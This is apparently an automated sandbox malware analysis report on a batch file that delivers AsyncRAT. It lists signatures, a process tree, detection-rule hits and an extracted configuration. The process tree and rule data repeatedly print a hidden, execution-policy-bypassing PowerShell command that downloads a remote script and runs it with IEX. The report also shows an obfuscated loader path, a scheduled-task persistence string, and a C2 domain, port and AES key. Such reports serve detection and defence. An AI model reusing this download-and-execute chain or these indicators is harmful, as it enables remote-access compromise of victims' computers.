Windows Analysis Report
Pe4905VGl1.bat

Overview

General Information

Sample name: Pe4905VGl1.bat (renamed because original name is a hash value)
Original sample name: 5dee2d0dd4d3eee97c372b6a8dbd3d3042d24b9483addfa9f8786617a88e268b.bat
Analysis ID: 1562421
MD5: 4527c576f1af0580c8d96ac23c8f761c
SHA1: dac3bf00eeb34c9c1d9dca63973f2e04da045383
SHA256: 5dee2d0dd4d3eee97c372b6a8dbd3d3042d24b9483addfa9f8786617a88e268b
Tags: bat, ducksex-ddnsfree-com, user-JAMESWT_MHT

Detection

AsyncRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell Download and Execute IEX
Yara detected AsyncRAT
Yara detected Powershell decode and execute
.NET source code contains potential unpacker
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Creates an undocumented autostart registry key
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs new ROOT certificates
Loading BitLocker PowerShell Module
PowerShell case anomaly found
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powerup Write Hijack DLL
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Yara detected MSILLoadEncryptedAssembly
Yara detected Obfuscated Powershell
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: AspNetCompiler Execution
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 1872 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Pe4905VGl1.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2160 cmdline: CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 2216 cmdline: pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • taskkill.exe (PID: 2616 cmdline: "C:\Windows\system32\taskkill.exe" /IM CCleanerBrowser.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 6744 cmdline: "C:\Windows\system32\taskkill.exe" /IM aspnet_regbrowsers.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 1056 cmdline: "C:\Windows\system32\taskkill.exe" /IM aspnet_compiler.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 2044 cmdline: "C:\Windows\system32\taskkill.exe" /IM AppLaunch.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 7104 cmdline: "C:\Windows\system32\taskkill.exe" /IM InstallUtil.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 6932 cmdline: "C:\Windows\system32\taskkill.exe" /IM jsc.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 4424 cmdline: "C:\Windows\system32\taskkill.exe" /IM MSBuild.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 3528 cmdline: "C:\Windows\system32\taskkill.exe" /IM RegAsm.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 5012 cmdline: "C:\Windows\system32\taskkill.exe" /IM cvtres.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 416 cmdline: "C:\Windows\system32\taskkill.exe" /IM RegSvcs.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • wscript.exe (PID: 1976 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\MJMDVSAJFXR.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
          • cmd.exe (PID: 6764 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\AXAGFIIEZBBS.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 1012 cmdline: PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\AMRKKUAMRKKsAMRKKeAMRKKrAMRKKs\PAMRKKuAMRKKbAMRKKlAMRKKiAMRKKc\LMKGJHPBNG.ps1'.replace('AMRKK','')" MD5: 04029E121A0CFA5991749937DD22A1D9)
              • aspnet_compiler.exe (PID: 4200 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
              • aspnet_compiler.exe (PID: 6676 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
  • cleanup
Name: AsyncRAT
Description: AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool; however, it can also be used maliciously because it provides functionality such as a keylogger, remote desktop control, and many other functions that may cause harm to the victim's computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kits and other techniques.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Malware Configuration Extractor: AsyncRAT {"External_config_on_Pastebin": "null", "Server": "ducksex.ddnsfree.com", "Ports": "6161", "Version": "| CRACKED BY DEXTER-LY", "Autorun": "false", "Install_Folder": "UW1DWFNXQjRwTmZCcFN1WmRScE1TVEFQNkpZbmhIZWs=", "Install_File": "sM1ePJDTnlj3DtRAz7+dWOd5NGp5JQWsyrDZoPOlJQDTb6jNyWYXx3QMnyuazNtSs7TQ57FEdZieCqG12wLzhyExZMmCcwHl79x+3yuqL/o=", "AES_key": "QmCXSWB4pNfBpSuZdRpMSTAP6JYnhHek", "Mutex": "GG80pUNCFqeIBsLjHLFYJTVxcawRFwtyGo3CUv8xEr0FQ6fayqNqTizrEpLDnkgAkRFa6hxF8dqxu+8cWlEx829UEfZzHcDtfExYTn9JPBWbtOKZfw4jPt8BlpiKdSTcCPZcxhdww4SzQGSarZOzg+MYK1z13oJY6L5BAe2N9KV9U5sFSnNdnFxb3SV0JNc7e9PKmLRCiUgzHl8Q8taRcYgRrN3tD4w0o2FHstUZu246ixPat3z7xwdfym33m3Jstui7wHMCAjdaNH7DrBk5e0floJOx+2JRpCMlGENd9s5KiTp0ZHYtf1uTvLnza2eOL0IKBAJlscjt3Po1R2XyBJPSEp+aKzENQnfU45Bmab8RuRIzLbge67JD2+kLLP0Een/8+4UAdZz1Mj1xDhI2HumHhSzchUaWN7LCuXk6O3HsHv3d5e2sdrZkBmyJWGFQWGqN0clCQDqFOEFO5TcGZ0qL2A/obsKfDkuDm5s7FbE0cd6rw8PytF8ssXzTgg/lSrAXPNC03HV5KKrApYl04Tztmm/K0cWqyfE5TWWyn9ipBYoXOVgklba41/DMtIqIlCFGpMkkY8L8EdMLZRvslLCAiBnCm2SLqiBYivVWNIYDGfTOpAwchUWV3QfR5AtB8MgH5s4DJG7/RR4k2rNxE+dVRdMRR12ntFI+rGmuVQk=", "Certificate": "false", "ServerSignature": "true", "BDOS": "false", "Startup_Delay": "3", "Group": "null"}
Source | Rule | Description | Author | Strings
Pe4905VGl1.bat | JoeSecurity_ObfuscatedPowershell | Yara detected Obfuscated Powershell | Joe Security
Pe4905VGl1.bat | SUSP_PowerShell_Caret_Obfuscation_2 | Detects powershell keyword obfuscated with carets | Florian Roth
  • 0x1263:$r1: p^O^w^e^r^S^h^E^l^l
  • 0x1263:$r2: p^O^w^e^r^S^h^E^l^l

Source | Rule | Description | Author | Strings
00000004.00000002.2026750928.000002E7E3053000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_MSIL_Load_Encrypted_Assembly | Yara detected MSIL_Load_Encrypted_Assembly | Joe Security
00000004.00000002.1865192800.000002E7C8CF4000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_MSIL_Load_Encrypted_Assembly | Yara detected MSIL_Load_Encrypted_Assembly | Joe Security
00000004.00000002.1865192800.000002E7C8C60000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_MSIL_Load_Encrypted_Assembly | Yara detected MSIL_Load_Encrypted_Assembly | Joe Security
00000015.00000002.3894017282.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
00000015.00000002.3894017282.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Asyncrat_11a11ba1 | unknown | unknown
  • 0xcf68:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
  • 0x10238:$a2: Stub.exe
  • 0x102c8:$a2: Stub.exe
  • 0x9698:$a3: get_ActivatePong
  • 0xd180:$a4: vmware
  • 0xcff8:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
  • 0xa7e8:$a6: get_SslClient

Source | Rule | Description | Author | Strings
21.2.aspnet_compiler.exe.400000.0.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
19.2.powershell.exe.25702485170.7.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
21.2.aspnet_compiler.exe.400000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
19.2.powershell.exe.25702485170.7.unpack | Windows_Trojan_Asyncrat_11a11ba1 | unknown | unknown
  • 0xb368:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
  • 0xe238:$a2: Stub.exe
  • 0xe2c8:$a2: Stub.exe
  • 0x7a98:$a3: get_ActivatePong
  • 0xb580:$a4: vmware
  • 0xb3f8:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
  • 0x8be8:$a6: get_SslClient
19.2.powershell.exe.257018be6f0.2.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security

Source | Rule | Description | Author | Strings
amsi64_2216.amsi.csv | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security
amsi64_2216.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
  • 0xc09d:$b2: ::FromBase64String(
  • 0xb9d6:$s1: -join
  • 0x4dfe0:$s1: -join
  • 0x5182:$s4: +=
  • 0x5244:$s4: +=
  • 0x946b:$s4: +=
  • 0xb588:$s4: +=
  • 0xb872:$s4: +=
  • 0xb9b8:$s4: +=
  • 0x50013:$s4: +=
  • 0x5006b:$s4: +=
  • 0x5008f:$s4: +=
  • 0x500f3:$s4: +=
  • 0x5405e:$s4: +=
  • 0x540de:$s4: +=
  • 0x541a4:$s4: +=
  • 0x54224:$s4: +=
  • 0x543fa:$s4: +=
  • 0x5447e:$s4: +=
  • 0x4e8a7:$e4: Get-WmiObject
  • 0x4ea96:$e4: Get-Process

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\MJMDVSAJFXR.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\MJMDVSAJFXR.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2216, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\MJMDVSAJFXR.vbs" , ProcessId: 1976, ProcessName: wscript.exe
Source: File created | Author: Subhash Popuri (@pbssubhash) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2216, TargetFilename: C:\Users\Public\AXAGFIIEZBBS.bat
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\MJMDVSAJFXR.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\MJMDVSAJFXR.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2216, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\MJMDVSAJFXR.vbs" , ProcessId: 1976, ProcessName: wscript.exe
Source: File created | Author: Florian Roth (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2216, TargetFilename: C:\Users\Public\AXAGFIIEZBBS.bat
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\AMRKKUAMRKKsAMRKKeAMRKKrAMRKKs\PAMRKKuAMRKKbAMRKKlAMRKKiAMRKKc\LMKGJHPBNG.ps1'.replace('AMRKK','')", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1012, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 4200, ProcessName: aspnet_compiler.exe
Source: Process started | Author: frack113 | Data: Command: pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", CommandLine: pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", CommandLine|base64offset|contains: (D, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2160, ParentProcessName: cmd.exe, ProcessCommandLine: pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", ProcessId: 2216, ProcessName: powershell.exe
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2216, TargetFilename: C:\Users\Public\AXAGFIIEZBBS.bat
Source: Process started | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger | Data: Command: CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", CommandLine: CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Pe4905VGl1.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1872, ParentProcessName: cmd.exe, ProcessCommandLine: CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", ProcessId: 2160, ProcessName: cmd.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\MJMDVSAJFXR.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\MJMDVSAJFXR.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2216, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\MJMDVSAJFXR.vbs" , ProcessId: 1976, ProcessName: wscript.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", CommandLine: pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", CommandLine|base64offset|contains: (D, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2160, ParentProcessName: cmd.exe, ProcessCommandLine: pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", ProcessId: 2216, ProcessName: powershell.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2216, TargetFilename: C:\Users\Public\LMKGJHPBNG.ps1

Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", CommandLine: CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Pe4905VGl1.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1872, ParentProcessName: cmd.exe, ProcessCommandLine: CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", ProcessId: 2160, ProcessName: cmd.exe

No Suricata rule has matched

AV Detection

Source: 00000013.00000002.1753014941.00000257013AA000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: AsyncRAT {"External_config_on_Pastebin": "null", "Server": "ducksex.ddnsfree.com", "Ports": "6161", "Version": "| CRACKED BY DEXTER-LY", "Autorun": "false", "Install_Folder": "UW1DWFNXQjRwTmZCcFN1WmRScE1TVEFQNkpZbmhIZWs=", "Install_File": "sM1ePJDTnlj3DtRAz7+dWOd5NGp5JQWsyrDZoPOlJQDTb6jNyWYXx3QMnyuazNtSs7TQ57FEdZieCqG12wLzhyExZMmCcwHl79x+3yuqL/o=", "AES_key": "QmCXSWB4pNfBpSuZdRpMSTAP6JYnhHek", "Mutex": "GG80pUNCFqeIBsLjHLFYJTVxcawRFwtyGo3CUv8xEr0FQ6fayqNqTizrEpLDnkgAkRFa6hxF8dqxu+8cWlEx829UEfZzHcDtfExYTn9JPBWbtOKZfw4jPt8BlpiKdSTcCPZcxhdww4SzQGSarZOzg+MYK1z13oJY6L5BAe2N9KV9U5sFSnNdnFxb3SV0JNc7e9PKmLRCiUgzHl8Q8taRcYgRrN3tD4w0o2FHstUZu246ixPat3z7xwdfym33m3Jstui7wHMCAjdaNH7DrBk5e0floJOx+2JRpCMlGENd9s5KiTp0ZHYtf1uTvLnza2eOL0IKBAJlscjt3Po1R2XyBJPSEp+aKzENQnfU45Bmab8RuRIzLbge67JD2+kLLP0Een/8+4UAdZz1Mj1xDhI2HumHhSzchUaWN7LCuXk6O3HsHv3d5e2sdrZkBmyJWGFQWGqN0clCQDqFOEFO5TcGZ0qL2A/obsKfDkuDm5s7FbE0cd6rw8PytF8ssXzTgg/lSrAXPNC03HV5KKrApYl04Tztmm/K0cWqyfE5TWWyn9ipBYoXOVgklba41/DMtIqIlCFGpMkkY8L8EdMLZRvslLCAiBnCm2SLqiBYivVWNIYDGfTOpAwchUWV3QfR5AtB8MgH5s4DJG7/RR4k2rNxE+dVRdMRR12ntFI+rGmuVQk=", "Certificate": "false", "ServerSignature": "true", "BDOS": "false", "Startup_Delay": "3", "Group": "null"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: unknown | HTTPS traffic detected: 168.119.208.219:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.8:49709 version: TLS 1.2
